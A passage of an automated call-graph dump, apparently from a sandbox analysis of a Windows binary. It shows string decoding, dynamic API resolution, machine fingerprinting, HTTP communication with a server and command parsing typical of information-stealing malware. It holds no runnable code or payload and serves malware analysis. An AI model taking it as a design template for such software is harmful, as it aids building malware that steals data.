40282b 26738->26739 26740 4045c0 34 API calls 26739->26740 26741 402844 26740->26741 26742 4045c0 34 API calls 26741->26742 26743 40285d 26742->26743 26744 4045c0 34 API calls 26743->26744 26745 402876 26744->26745 26746 4045c0 34 API calls 26745->26746 26747 40288f 26746->26747 26748 4045c0 34 API calls 26747->26748 26749 4028a8 26748->26749 26750 4045c0 34 API calls 26749->26750 26751 4028c1 26750->26751 26752 4045c0 34 API calls 26751->26752 26753 4028da 26752->26753 26754 4045c0 34 API calls 26753->26754 26755 4028f3 26754->26755 26756 4045c0 34 API calls 26755->26756 26757 40290c 26756->26757 26758 4045c0 34 API calls 26757->26758 26759 402925 26758->26759 26760 4045c0 34 API calls 26759->26760 26761 40293e 26760->26761 26762 4045c0 34 API calls 26761->26762 26763 402957 26762->26763 26764 4045c0 34 API calls 26763->26764 26765 402970 26764->26765 26766 4045c0 34 API calls 26765->26766 26767 402989 26766->26767 26768 4045c0 34 API calls 26767->26768 26769 4029a2 26768->26769 26770 4045c0 34 API calls 26769->26770 26771 4029bb 26770->26771 26772 4045c0 34 API calls 26771->26772 26773 4029d4 26772->26773 26774 4045c0 34 API calls 26773->26774 26775 4029ed 26774->26775 26776 4045c0 34 API calls 26775->26776 26777 402a06 26776->26777 26778 4045c0 34 API calls 26777->26778 26779 402a1f 26778->26779 26780 4045c0 34 API calls 26779->26780 26781 402a38 26780->26781 26782 4045c0 34 API calls 26781->26782 26783 402a51 26782->26783 26784 4045c0 34 API calls 26783->26784 26785 402a6a 26784->26785 26786 4045c0 34 API calls 26785->26786 26787 402a83 26786->26787 26788 4045c0 34 API calls 26787->26788 26789 402a9c 26788->26789 26790 4045c0 34 API calls 26789->26790 26791 402ab5 26790->26791 26792 4045c0 34 API calls 26791->26792 26793 402ace 26792->26793 26794 4045c0 34 API calls 26793->26794 26795 402ae7 26794->26795 26796 4045c0 34 API calls 26795->26796 26797 402b00 26796->26797 26798 4045c0 34 API calls 26797->26798 26799 402b19 26798->26799 26800 4045c0 34 API calls 26799->26800 26801 402b32 26800->26801 26802 4045c0 34 API calls 26801->26802 26803 402b4b 26802->26803 26804 4045c0 34 API calls 26803->26804 26805 402b64 26804->26805 26806 4045c0 34 API calls 26805->26806 26807 402b7d 26806->26807 26808 4045c0 34 API calls 26807->26808 26809 402b96 26808->26809 26810 4045c0 34 API calls 26809->26810 26811 402baf 26810->26811 26812 4045c0 34 API calls 26811->26812 26813 402bc8 26812->26813 26814 4045c0 34 API calls 26813->26814 26815 402be1 26814->26815 26816 4045c0 34 API calls 26815->26816 26817 402bfa 26816->26817 26818 4045c0 34 API calls 26817->26818 26819 402c13 26818->26819 26820 4045c0 34 API calls 26819->26820 26821 402c2c 26820->26821 26822 4045c0 34 API calls 26821->26822 26823 402c45 26822->26823 26824 4045c0 34 API calls 26823->26824 26825 402c5e 26824->26825 26826 4045c0 34 API calls 26825->26826 26827 402c77 26826->26827 26828 4045c0 34 API calls 26827->26828 26829 402c90 26828->26829 26830 4045c0 34 API calls 26829->26830 26831 402ca9 26830->26831 26832 4045c0 34 API calls 26831->26832 26833 402cc2 26832->26833 26834 4045c0 34 API calls 26833->26834 26835 402cdb 26834->26835 26836 4045c0 34 API calls 26835->26836 26837 402cf4 26836->26837 26838 4045c0 34 API calls 26837->26838 26839 402d0d 26838->26839 26840 4045c0 34 API calls 26839->26840 26841 402d26 26840->26841 26842 4045c0 34 API calls 26841->26842 26843 402d3f 26842->26843 26844 4045c0 34 API calls 26843->26844 26845 402d58 26844->26845 26846 4045c0 34 API calls 26845->26846 26847 402d71 26846->26847 26848 4045c0 34 API calls 26847->26848 26849 402d8a 26848->26849 26850 4045c0 34 API calls 26849->26850 26851 402da3 26850->26851 26852 4045c0 34 API calls 26851->26852 26853 402dbc 26852->26853 26854 4045c0 34 API calls 26853->26854 26855 402dd5 26854->26855 26856 4045c0 34 API calls 26855->26856 26857 402dee 26856->26857 26858 4045c0 34 API calls 26857->26858 26859 402e07 26858->26859 26860 4045c0 34 API calls 26859->26860 26861 402e20 26860->26861 26862 4045c0 34 API calls 26861->26862 26863 402e39 26862->26863 26864 4045c0 34 API calls 26863->26864 26865 402e52 26864->26865 26866 4045c0 34 API calls 26865->26866 26867 402e6b 26866->26867 26868 4045c0 34 API calls 26867->26868 26869 402e84 26868->26869 26870 4045c0 34 API calls 26869->26870 26871 402e9d 26870->26871 26872 4045c0 34 API calls 26871->26872 26873 402eb6 26872->26873 26874 4045c0 34 API calls 26873->26874 26875 402ecf 26874->26875 26876 4045c0 34 API calls 26875->26876 26877 402ee8 26876->26877 26878 4045c0 34 API calls 26877->26878 26879 402f01 26878->26879 26880 4045c0 34 API calls 26879->26880 26881 402f1a 26880->26881 26882 4045c0 34 API calls 26881->26882 26883 402f33 26882->26883 26884 4045c0 34 API calls 26883->26884 26885 402f4c 26884->26885 26886 4045c0 34 API calls 26885->26886 26887 402f65 26886->26887 26888 4045c0 34 API calls 26887->26888 26889 402f7e 26888->26889 26890 4045c0 34 API calls 26889->26890 26891 402f97 26890->26891 26892 4045c0 34 API calls 26891->26892 26893 402fb0 26892->26893 26894 4045c0 34 API calls 26893->26894 26895 402fc9 26894->26895 26896 4045c0 34 API calls 26895->26896 26897 402fe2 26896->26897 26898 4045c0 34 API calls 26897->26898 26899 402ffb 26898->26899 26900 4045c0 34 API calls 26899->26900 26901 403014 26900->26901 26902 4045c0 34 API calls 26901->26902 26903 40302d 26902->26903 26904 4045c0 34 API calls 26903->26904 26905 403046 26904->26905 26906 4045c0 34 API calls 26905->26906 26907 40305f 26906->26907 26908 4045c0 34 API calls 26907->26908 26909 403078 26908->26909 26910 4045c0 34 API calls 26909->26910 26911 403091 26910->26911 26912 4045c0 34 API calls 26911->26912 26913 4030aa 26912->26913 26914 4045c0 34 API calls 26913->26914 26915 4030c3 26914->26915 26916 4045c0 34 API calls 26915->26916 26917 4030dc 26916->26917 26918 4045c0 34 API calls 26917->26918 26919 4030f5 26918->26919 26920 4045c0 34 API calls 26919->26920 26921 40310e 26920->26921 26922 4045c0 34 API calls 26921->26922 26923 403127 26922->26923 26924 4045c0 34 API calls 26923->26924 26925 403140 26924->26925 26926 4045c0 34 API calls 26925->26926 26927 403159 26926->26927 26928 4045c0 34 API calls 26927->26928 26929 403172 26928->26929 26930 4045c0 34 API calls 26929->26930 26931 40318b 26930->26931 26932 4045c0 34 API calls 26931->26932 26933 4031a4 26932->26933 26934 4045c0 34 API calls 26933->26934 26935 4031bd 26934->26935 26936 4045c0 34 API calls 26935->26936 26937 4031d6 26936->26937 26938 4045c0 34 API calls 26937->26938 26939 4031ef 26938->26939 26940 4045c0 34 API calls 26939->26940 26941 403208 26940->26941 26942 4045c0 34 API calls 26941->26942 26943 403221 26942->26943 26944 4045c0 34 API calls 26943->26944 26945 40323a 26944->26945 26946 4045c0 34 API calls 26945->26946 26947 403253 26946->26947 26948 4045c0 34 API calls 26947->26948 26949 40326c 26948->26949 26950 4045c0 34 API calls 26949->26950 26951 403285 26950->26951 26952 4045c0 34 API calls 26951->26952 26953 40329e 26952->26953 26954 4045c0 34 API calls 26953->26954 26955 4032b7 26954->26955 26956 4045c0 34 API calls 26955->26956 26957 4032d0 26956->26957 26958 4045c0 34 API calls 26957->26958 26959 4032e9 26958->26959 26960 4045c0 34 API calls 26959->26960 26961 403302 26960->26961 26962 4045c0 34 API calls 26961->26962 26963 40331b 26962->26963 26964 4045c0 34 API calls 26963->26964 26965 403334 26964->26965 26966 4045c0 34 API calls 26965->26966 26967 40334d 26966->26967 26968 4045c0 34 API calls 26967->26968 26969 403366 26968->26969 26970 4045c0 34 API calls 26969->26970 26971 40337f 26970->26971 26972 4045c0 34 API calls 26971->26972 26973 403398 26972->26973 26974 4045c0 34 API calls 26973->26974 26975 4033b1 26974->26975 26976 4045c0 34 API calls 26975->26976 26977 4033ca 26976->26977 26978 4045c0 34 API calls 26977->26978 26979 4033e3 26978->26979 26980 4045c0 34 API calls 26979->26980 26981 4033fc 26980->26981 26982 4045c0 34 API calls 26981->26982 26983 403415 26982->26983 26984 4045c0 34 API calls 26983->26984 26985 40342e 26984->26985 26986 4045c0 34 API calls 26985->26986 26987 403447 26986->26987 26988 4045c0 34 API calls 26987->26988 26989 403460 26988->26989 26990 4045c0 34 API calls 26989->26990 26991 403479 26990->26991 26992 4045c0 34 API calls 26991->26992 26993 403492 26992->26993 26994 4045c0 34 API calls 26993->26994 26995 4034ab 26994->26995 26996 4045c0 34 API calls 26995->26996 26997 4034c4 26996->26997 26998 4045c0 34 API calls 26997->26998 26999 4034dd 26998->26999 27000 4045c0 34 API calls 26999->27000 27001 4034f6 27000->27001 27002 4045c0 34 API calls 27001->27002 27003 40350f 27002->27003 27004 4045c0 34 API calls 27003->27004 27005 403528 27004->27005 27006 4045c0 34 API calls 27005->27006 27007 403541 27006->27007 27008 4045c0 34 API calls 27007->27008 27009 40355a 27008->27009 27010 4045c0 34 API calls 27009->27010 27011 403573 27010->27011 27012 4045c0 34 API calls 27011->27012 27013 40358c 27012->27013 27014 4045c0 34 API calls 27013->27014 27015 4035a5 27014->27015 27016 4045c0 34 API calls 27015->27016 27017 4035be 27016->27017 27018 4045c0 34 API calls 27017->27018 27019 4035d7 27018->27019 27020 4045c0 34 API calls 27019->27020 27021 4035f0 27020->27021 27022 4045c0 34 API calls 27021->27022 27023 403609 27022->27023 27024 4045c0 34 API calls 27023->27024 27025 403622 27024->27025 27026 4045c0 34 API calls 27025->27026 27027 40363b 27026->27027 27028 4045c0 34 API calls 27027->27028 27029 403654 27028->27029 27030 4045c0 34 API calls 27029->27030 27031 40366d 27030->27031 27032 4045c0 34 API calls 27031->27032 27033 403686 27032->27033 27034 4045c0 34 API calls 27033->27034 27035 40369f 27034->27035 27036 4045c0 34 API calls 27035->27036 27037 4036b8 27036->27037 27038 4045c0 34 API calls 27037->27038 27039 4036d1 27038->27039 27040 4045c0 34 API calls 27039->27040 27041 4036ea 27040->27041 27042 4045c0 34 API calls 27041->27042 27043 403703 27042->27043 27044 4045c0 34 API calls 27043->27044 27045 40371c 27044->27045 27046 4045c0 34 API calls 27045->27046 27047 403735 27046->27047 27048 4045c0 34 API calls 27047->27048 27049 40374e 27048->27049 27050 4045c0 34 API calls 27049->27050 27051 403767 27050->27051 27052 4045c0 34 API calls 27051->27052 27053 403780 27052->27053 27054 4045c0 34 API calls 27053->27054 27055 403799 27054->27055 27056 4045c0 34 API calls 27055->27056 27057 4037b2 27056->27057 27058 4045c0 34 API calls 27057->27058 27059 4037cb 27058->27059 27060 4045c0 34 API calls 27059->27060 27061 4037e4 27060->27061 27062 4045c0 34 API calls 27061->27062 27063 4037fd 27062->27063 27064 4045c0 34 API calls 27063->27064 27065 403816 27064->27065 27066 4045c0 34 API calls 27065->27066 27067 40382f 27066->27067 27068 4045c0 34 API calls 27067->27068 27069 403848 27068->27069 27070 4045c0 34 API calls 27069->27070 27071 403861 27070->27071 27072 4045c0 34 API calls 27071->27072 27073 40387a 27072->27073 27074 4045c0 34 API calls 27073->27074 27075 403893 27074->27075 27076 4045c0 34 API calls 27075->27076 27077 4038ac 27076->27077 27078 4045c0 34 API calls 27077->27078 27079 4038c5 27078->27079 27080 4045c0 34 API calls 27079->27080 27081 4038de 27080->27081 27082 4045c0 34 API calls 27081->27082 27083 4038f7 27082->27083 27084 4045c0 34 API calls 27083->27084 27085 403910 27084->27085 27086 4045c0 34 API calls 27085->27086 27087 403929 27086->27087 27088 4045c0 34 API calls 27087->27088 27089 403942 27088->27089 27090 4045c0 34 API calls 27089->27090 27091 40395b 27090->27091 27092 4045c0 34 API calls 27091->27092 27093 403974 27092->27093 27094 4045c0 34 API calls 27093->27094 27095 40398d 27094->27095 27096 4045c0 34 API calls 27095->27096 27097 4039a6 27096->27097 27098 4045c0 34 API calls 27097->27098 27099 4039bf 27098->27099 27100 4045c0 34 API calls 27099->27100 27101 4039d8 27100->27101 27102 4045c0 34 API calls 27101->27102 27103 4039f1 27102->27103 27104 4045c0 34 API calls 27103->27104 27105 403a0a 27104->27105 27106 4045c0 34 API calls 27105->27106 27107 403a23 27106->27107 27108 4045c0 34 API calls 27107->27108 27109 403a3c 27108->27109 27110 4045c0 34 API calls 27109->27110 27111 403a55 27110->27111 27112 4045c0 34 API calls 27111->27112 27113 403a6e 27112->27113 27114 4045c0 34 API calls 27113->27114 27115 403a87 27114->27115 27116 4045c0 34 API calls 27115->27116 27117 403aa0 27116->27117 27118 4045c0 34 API calls 27117->27118 27119 403ab9 27118->27119 27120 4045c0 34 API calls 27119->27120 27121 403ad2 27120->27121 27122 4045c0 34 API calls 27121->27122 27123 403aeb 27122->27123 27124 4045c0 34 API calls 27123->27124 27125 403b04 27124->27125 27126 4045c0 34 API calls 27125->27126 27127 403b1d 27126->27127 27128 4045c0 34 API calls 27127->27128 27129 403b36 27128->27129 27130 4045c0 34 API calls 27129->27130 27131 403b4f 27130->27131 27132 4045c0 34 API calls 27131->27132 27133 403b68 27132->27133 27134 4045c0 34 API calls 27133->27134 27135 403b81 27134->27135 27136 4045c0 34 API calls 27135->27136 27137 403b9a 27136->27137 27138 4045c0 34 API calls 27137->27138 27139 403bb3 27138->27139 27140 4045c0 34 API calls 27139->27140 27141 403bcc 27140->27141 27142 4045c0 34 API calls 27141->27142 27143 403be5 27142->27143 27144 4045c0 34 API calls 27143->27144 27145 403bfe 27144->27145 27146 4045c0 34 API calls 27145->27146 27147 403c17 27146->27147 27148 4045c0 34 API calls 27147->27148 27149 403c30 27148->27149 27150 4045c0 34 API calls 27149->27150 27151 403c49 27150->27151 27152 4045c0 34 API calls 27151->27152 27153 403c62 27152->27153 27154 4045c0 34 API calls 27153->27154 27155 403c7b 27154->27155 27156 4045c0 34 API calls 27155->27156 27157 403c94 27156->27157 27158 4045c0 34 API calls 27157->27158 27159 403cad 27158->27159 27160 4045c0 34 API calls 27159->27160 27161 403cc6 27160->27161 27162 4045c0 34 API calls 27161->27162 27163 403cdf 27162->27163 27164 4045c0 34 API calls 27163->27164 27165 403cf8 27164->27165 27166 4045c0 34 API calls 27165->27166 27167 403d11 27166->27167 27168 4045c0 34 API calls 27167->27168 27169 403d2a 27168->27169 27170 4045c0 34 API calls 27169->27170 27171 403d43 27170->27171 27172 4045c0 34 API calls 27171->27172 27173 403d5c 27172->27173 27174 4045c0 34 API calls 27173->27174 27175 403d75 27174->27175 27176 4045c0 34 API calls 27175->27176 27177 403d8e 27176->27177 27178 4045c0 34 API calls 27177->27178 27179 403da7 27178->27179 27180 4045c0 34 API calls 27179->27180 27181 403dc0 27180->27181 27182 4045c0 34 API calls 27181->27182 27183 403dd9 27182->27183 27184 4045c0 34 API calls 27183->27184 27185 403df2 27184->27185 27186 4045c0 34 API calls 27185->27186 27187 403e0b 27186->27187 27188 4045c0 34 API calls 27187->27188 27189 403e24 27188->27189 27190 4045c0 34 API calls 27189->27190 27191 403e3d 27190->27191 27192 4045c0 34 API calls 27191->27192 27193 403e56 27192->27193 27194 4045c0 34 API calls 27193->27194 27195 403e6f 27194->27195 27196 4045c0 34 API calls 27195->27196 27197 403e88 27196->27197 27198 4045c0 34 API calls 27197->27198 27199 403ea1 27198->27199 27200 4045c0 34 API calls 27199->27200 27201 403eba 27200->27201 27202 4045c0 34 API calls 27201->27202 27203 403ed3 27202->27203 27204 4045c0 34 API calls 27203->27204 27205 403eec 27204->27205 27206 4045c0 34 API calls 27205->27206 27207 403f05 27206->27207 27208 4045c0 34 API calls 27207->27208 27209 403f1e 27208->27209 27210 4045c0 34 API calls 27209->27210 27211 403f37 27210->27211 27212 4045c0 34 API calls 27211->27212 27213 403f50 27212->27213 27214 4045c0 34 API calls 27213->27214 27215 403f69 27214->27215 27216 4045c0 34 API calls 27215->27216 27217 403f82 27216->27217 27218 4045c0 34 API calls 27217->27218 27219 403f9b 27218->27219 27220 4045c0 34 API calls 27219->27220 27221 403fb4 27220->27221 27222 4045c0 34 API calls 27221->27222 27223 403fcd 27222->27223 27224 4045c0 34 API calls 27223->27224 27225 403fe6 27224->27225 27226 4045c0 34 API calls 27225->27226 27227 403fff 27226->27227 27228 4045c0 34 API calls 27227->27228 27229 404018 27228->27229 27230 4045c0 34 API calls 27229->27230 27231 404031 27230->27231 27232 4045c0 34 API calls 27231->27232 27233 40404a 27232->27233 27234 4045c0 34 API calls 27233->27234 27235 404063 27234->27235 27236 4045c0 34 API calls 27235->27236 27237 40407c 27236->27237 27238 4045c0 34 API calls 27237->27238 27239 404095 27238->27239 27240 4045c0 34 API calls 27239->27240 27241 4040ae 27240->27241 27242 4045c0 34 API calls 27241->27242 27243 4040c7 27242->27243 27244 4045c0 34 API calls 27243->27244 27245 4040e0 27244->27245 27246 4045c0 34 API calls 27245->27246 27247 4040f9 27246->27247 27248 4045c0 34 API calls 27247->27248 27249 404112 27248->27249 27250 4045c0 34 API calls 27249->27250 27251 40412b 27250->27251 27252 4045c0 34 API calls 27251->27252 27253 404144 27252->27253 27254 4045c0 34 API calls 27253->27254 27255 40415d 27254->27255 27256 4045c0 34 API calls 27255->27256 27257 404176 27256->27257 27258 4045c0 34 API calls 27257->27258 27259 40418f 27258->27259 27260 4045c0 34 API calls 27259->27260 27261 4041a8 27260->27261 27262 4045c0 34 API calls 27261->27262 27263 4041c1 27262->27263 27264 4045c0 34 API calls 27263->27264 27265 4041da 27264->27265 27266 4045c0 34 API calls 27265->27266 27267 4041f3 27266->27267 27268 4045c0 34 API calls 27267->27268 27269 40420c 27268->27269 27270 4045c0 34 API calls 27269->27270 27271 404225 27270->27271 27272 4045c0 34 API calls 27271->27272 27273 40423e 27272->27273 27274 4045c0 34 API calls 27273->27274 27275 404257 27274->27275 27276 4045c0 34 API calls 27275->27276 27277 404270 27276->27277 27278 4045c0 34 API calls 27277->27278 27279 404289 27278->27279 27280 4045c0 34 API calls 27279->27280 27281 4042a2 27280->27281 27282 4045c0 34 API calls 27281->27282 27283 4042bb 27282->27283 27284 4045c0 34 API calls 27283->27284 27285 4042d4 27284->27285 27286 4045c0 34 API calls 27285->27286 27287 4042ed 27286->27287 27288 4045c0 34 API calls 27287->27288 27289 404306 27288->27289 27290 4045c0 34 API calls 27289->27290 27291 40431f 27290->27291 27292 4045c0 34 API calls 27291->27292 27293 404338 27292->27293 27294 4045c0 34 API calls 27293->27294 27295 404351 27294->27295 27296 4045c0 34 API calls 27295->27296 27297 40436a 27296->27297 27298 4045c0 34 API calls 27297->27298 27299 404383 27298->27299 27300 4045c0 34 API calls 27299->27300 27301 40439c 27300->27301 27302 4045c0 34 API calls 27301->27302 27303 4043b5 27302->27303 27304 4045c0 34 API calls 27303->27304 27305 4043ce 27304->27305 27306 4045c0 34 API calls 27305->27306 27307 4043e7 27306->27307 27308 4045c0 34 API calls 27307->27308 27309 404400 27308->27309 27310 4045c0 34 API calls 27309->27310 27311 404419 27310->27311 27312 4045c0 34 API calls 27311->27312 27313 404432 27312->27313 27314 4045c0 34 API calls 27313->27314 27315 40444b 27314->27315 27316 4045c0 34 API calls 27315->27316 27317 404464 27316->27317 27318 4045c0 34 API calls 27317->27318 27319 40447d 27318->27319 27320 4045c0 34 API calls 27319->27320 27321 404496 27320->27321 27322 4045c0 34 API calls 27321->27322 27323 4044af 27322->27323 27324 4045c0 34 API calls 27323->27324 27325 4044c8 27324->27325 27326 4045c0 34 API calls 27325->27326 27327 4044e1 27326->27327 27328 4045c0 34 API calls 27327->27328 27329 4044fa 27328->27329 27330 4045c0 34 API calls 27329->27330 27331 404513 27330->27331 27332 4045c0 34 API calls 27331->27332 27333 40452c 27332->27333 27334 4045c0 34 API calls 27333->27334 27335 404545 27334->27335 27336 4045c0 34 API calls 27335->27336 27337 40455e 27336->27337 27338 4045c0 34 API calls 27337->27338 27339 404577 27338->27339 27340 4045c0 34 API calls 27339->27340 27341 404590 27340->27341 27342 4045c0 34 API calls 27341->27342 27343 4045a9 27342->27343 27344 419c10 27343->27344 27345 419c20 43 API calls 27344->27345 27346 41a036 8 API calls 27344->27346 27345->27346 27347 41a146 27346->27347 27348 41a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27346->27348 27349 41a153 8 API calls 27347->27349 27350 41a216 27347->27350 27348->27347 27349->27350 27351 41a298 27350->27351 27352 41a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27350->27352 27353 41a2a5 6 API calls 27351->27353 27354 41a337 27351->27354 27352->27351 27353->27354 27355 41a344 9 API calls 27354->27355 27356 41a41f 27354->27356 27355->27356 27357 41a4a2 27356->27357 27358 41a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27356->27358 27359 41a4ab GetProcAddress GetProcAddress 27357->27359 27360 41a4dc 27357->27360 27358->27357 27359->27360 27361 41a515 27360->27361 27362 41a4e5 GetProcAddress GetProcAddress 27360->27362 27363 41a612 27361->27363 27364 41a522 10 API calls 27361->27364 27362->27361 27365 41a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27363->27365 27366 41a67d 27363->27366 27364->27363 27365->27366 27367 41a686 GetProcAddress 27366->27367 27368 41a69e 27366->27368 27367->27368 27369 41a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27368->27369 27370 415ca3 27368->27370 27369->27370 27371 401590 27370->27371 27646 401670 27371->27646 27374 41a7a0 lstrcpy 27375 4015b5 27374->27375 27376 41a7a0 lstrcpy 27375->27376 27377 4015c7 27376->27377 27378 41a7a0 lstrcpy 27377->27378 27379 4015d9 27378->27379 27380 41a7a0 lstrcpy 27379->27380 27381 401663 27380->27381 27382 415510 27381->27382 27383 415521 27382->27383 27384 41a820 2 API calls 27383->27384 27385 41552e 27384->27385 27386 41a820 2 API calls 27385->27386 27387 41553b 27386->27387 27388 41a820 2 API calls 27387->27388 27389 415548 27388->27389 27390 41a740 lstrcpy 27389->27390 27391 415555 27390->27391 27392 41a740 lstrcpy 27391->27392 27393 415562 27392->27393 27394 41a740 lstrcpy 27393->27394 27395 41556f 27394->27395 27396 41a740 lstrcpy 27395->27396 27436 41557c 27396->27436 27397 41a740 lstrcpy 27397->27436 27398 415643 StrCmpCA 27398->27436 27399 4156a0 StrCmpCA 27400 4157dc 27399->27400 27399->27436 27401 41a8a0 lstrcpy 27400->27401 27402 4157e8 27401->27402 27403 41a820 2 API calls 27402->27403 27405 4157f6 27403->27405 27404 41a820 lstrlenA lstrcpy 27404->27436 27407 41a820 2 API calls 27405->27407 27406 415856 StrCmpCA 27408 415991 27406->27408 27406->27436 27410 415805 27407->27410 27409 41a8a0 lstrcpy 27408->27409 27411 41599d 27409->27411 27412 401670 lstrcpy 27410->27412 27413 41a820 2 API calls 27411->27413 27435 415811 27412->27435 27415 4159ab 27413->27415 27414 4151f0 23 API calls 27414->27436 27417 41a820 2 API calls 27415->27417 27416 415a0b StrCmpCA 27418 415a16 Sleep 27416->27418 27419 415a28 27416->27419 27421 4159ba 27417->27421 27418->27436 27422 41a8a0 lstrcpy 27419->27422 27420 41a8a0 lstrcpy 27420->27436 27423 401670 lstrcpy 27421->27423 27424 415a34 27422->27424 27423->27435 27425 41a820 2 API calls 27424->27425 27426 415a43 27425->27426 27428 41a820 2 API calls 27426->27428 27427 4152c0 29 API calls 27427->27436 27429 415a52 27428->27429 27431 401670 lstrcpy 27429->27431 27430 41578a StrCmpCA 27430->27436 27431->27435 27432 41a7a0 lstrcpy 27432->27436 27433 41593f StrCmpCA 27433->27436 27434 401590 lstrcpy 27434->27436 27435->26490 27436->27397 27436->27398 27436->27399 27436->27404 27436->27406 27436->27414 27436->27416 27436->27420 27436->27427 27436->27430 27436->27432 27436->27433 27436->27434 27438 417553 GetVolumeInformationA 27437->27438 27439 41754c 27437->27439 27440 417591 27438->27440 27439->27438 27441 4175fc GetProcessHeap HeapAlloc 27440->27441 27442 417619 27441->27442 27443 417628 wsprintfA 27441->27443 27444 41a740 lstrcpy 27442->27444 27445 41a740 lstrcpy 27443->27445 27446 415da7 27444->27446 27445->27446 27446->26511 27448 41a7a0 lstrcpy 27447->27448 27449 404899 27448->27449 27655 4047b0 27449->27655 27451 4048a5 27452 41a740 lstrcpy 27451->27452 27453 4048d7 27452->27453 27454 41a740 lstrcpy 27453->27454 27455 4048e4 27454->27455 27456 41a740 lstrcpy 27455->27456 27457 4048f1 27456->27457 27458 41a740 lstrcpy 27457->27458 27459 4048fe 27458->27459 27460 41a740 lstrcpy 27459->27460 27461 40490b InternetOpenA StrCmpCA 27460->27461 27462 404944 27461->27462 27463 404955 27462->27463 27464 404ecb InternetCloseHandle 27462->27464 27668 418b60 GetSystemTime lstrcpy lstrcpy 27463->27668 27466 404ee8 27464->27466 27663 409ac0 CryptStringToBinaryA 27466->27663 27467 404963 27669 41a920 lstrcpy lstrcpy lstrcatA 27467->27669 27470 404976 27472 41a8a0 lstrcpy 27470->27472 27477 40497f 27472->27477 27473 41a820 2 API calls 27474 404f05 27473->27474 27476 41a9b0 4 API calls 27474->27476 27475 404f27 moneypunct 27479 41a7a0 lstrcpy 27475->27479 27478 404f1b 27476->27478 27481 41a9b0 4 API calls 27477->27481 27480 41a8a0 lstrcpy 27478->27480 27492 404f57 27479->27492 27480->27475 27482 4049a9 27481->27482 27483 41a8a0 lstrcpy 27482->27483 27484 4049b2 27483->27484 27485 41a9b0 4 API calls 27484->27485 27486 4049d1 27485->27486 27487 41a8a0 lstrcpy 27486->27487 27488 4049da 27487->27488 27670 41a920 lstrcpy lstrcpy lstrcatA 27488->27670 27490 4049f8 27491 41a8a0 lstrcpy 27490->27491 27493 404a01 27491->27493 27492->26514 27494 41a9b0 4 API calls 27493->27494 27495 404a20 27494->27495 27496 41a8a0 lstrcpy 27495->27496 27497 404a29 27496->27497 27498 41a9b0 4 API calls 27497->27498 27499 404a48 27498->27499 27500 41a8a0 lstrcpy 27499->27500 27501 404a51 27500->27501 27502 41a9b0 4 API calls 27501->27502 27503 404a7d 27502->27503 27671 41a920 lstrcpy lstrcpy lstrcatA 27503->27671 27505 404a84 27506 41a8a0 lstrcpy 27505->27506 27507 404a8d 27506->27507 27508 404aa3 InternetConnectA 27507->27508 27508->27464 27509 404ad3 HttpOpenRequestA 27508->27509 27511 404b28 27509->27511 27512 404ebe InternetCloseHandle 27509->27512 27513 41a9b0 4 API calls 27511->27513 27512->27464 27514 404b3c 27513->27514 27515 41a8a0 lstrcpy 27514->27515 27516 404b45 27515->27516 27672 41a920 lstrcpy lstrcpy lstrcatA 27516->27672 27518 404b63 27519 41a8a0 lstrcpy 27518->27519 27520 404b6c 27519->27520 27521 41a9b0 4 API calls 27520->27521 27522 404b8b 27521->27522 27523 41a8a0 lstrcpy 27522->27523 27524 404b94 27523->27524 27525 41a9b0 4 API calls 27524->27525 27526 404bb5 27525->27526 27527 41a8a0 lstrcpy 27526->27527 27528 404bbe 27527->27528 27529 41a9b0 4 API calls 27528->27529 27530 404bde 27529->27530 27531 41a8a0 lstrcpy 27530->27531 27532 404be7 27531->27532 27533 41a9b0 4 API calls 27532->27533 27534 404c06 27533->27534 27535 41a8a0 lstrcpy 27534->27535 27536 404c0f 27535->27536 27673 41a920 lstrcpy lstrcpy lstrcatA 27536->27673 27538 404c2d 27539 41a8a0 lstrcpy 27538->27539 27540 404c36 27539->27540 27541 41a9b0 4 API calls 27540->27541 27542 404c55 27541->27542 27543 41a8a0 lstrcpy 27542->27543 27544 404c5e 27543->27544 27545 41a9b0 4 API calls 27544->27545 27546 404c7d 27545->27546 27547 41a8a0 lstrcpy 27546->27547 27548 404c86 27547->27548 27674 41a920 lstrcpy lstrcpy lstrcatA 27548->27674 27550 404ca4 27551 41a8a0 lstrcpy 27550->27551 27552 404cad 27551->27552 27553 41a9b0 4 API calls 27552->27553 27554 404ccc 27553->27554 27555 41a8a0 lstrcpy 27554->27555 27556 404cd5 27555->27556 27557 41a9b0 4 API calls 27556->27557 27558 404cf6 27557->27558 27559 41a8a0 lstrcpy 27558->27559 27560 404cff 27559->27560 27561 41a9b0 4 API calls 27560->27561 27562 404d1f 27561->27562 27563 41a8a0 lstrcpy 27562->27563 27564 404d28 27563->27564 27565 41a9b0 4 API calls 27564->27565 27566 404d47 27565->27566 27567 41a8a0 lstrcpy 27566->27567 27568 404d50 27567->27568 27675 41a920 lstrcpy lstrcpy lstrcatA 27568->27675 27570 404d6e 27571 41a8a0 lstrcpy 27570->27571 27572 404d77 27571->27572 27573 41a740 lstrcpy 27572->27573 27574 404d92 27573->27574 27676 41a920 lstrcpy lstrcpy lstrcatA 27574->27676 27576 404db3 27677 41a920 lstrcpy lstrcpy lstrcatA 27576->27677 27578 404dba 27579 41a8a0 lstrcpy 27578->27579 27580 404dc6 27579->27580 27581 404de7 lstrlenA 27580->27581 27582 404dfa 27581->27582 27583 404e03 lstrlenA 27582->27583 27678 41aad0 27583->27678 27585 404e13 HttpSendRequestA 27586 404e32 InternetReadFile 27585->27586 27587 404e67 InternetCloseHandle 27586->27587 27592 404e5e 27586->27592 27589 41a800 27587->27589 27589->27512 27590 41a9b0 4 API calls 27590->27592 27591 41a8a0 lstrcpy 27591->27592 27592->27586 27592->27587 27592->27590 27592->27591 27683 41aad0 27593->27683 27595 4117c4 StrCmpCA 27596 4117d7 27595->27596 27597 4117cf ExitProcess 27595->27597 27598 4117e7 strtok_s 27596->27598 27612 4117f4 27598->27612 27599 4119c2 27599->26516 27600 41199e strtok_s 27600->27612 27601 4118ad StrCmpCA 27601->27612 27602 4118cf StrCmpCA 27602->27612 27603 4118f1 StrCmpCA 27603->27612 27604 411951 StrCmpCA 27604->27612 27605 411970 StrCmpCA 27605->27612 27606 411913 StrCmpCA 27606->27612 27607 411932 StrCmpCA 27607->27612 27608 41185d StrCmpCA 27608->27612 27609 41187f StrCmpCA 27609->27612 27610 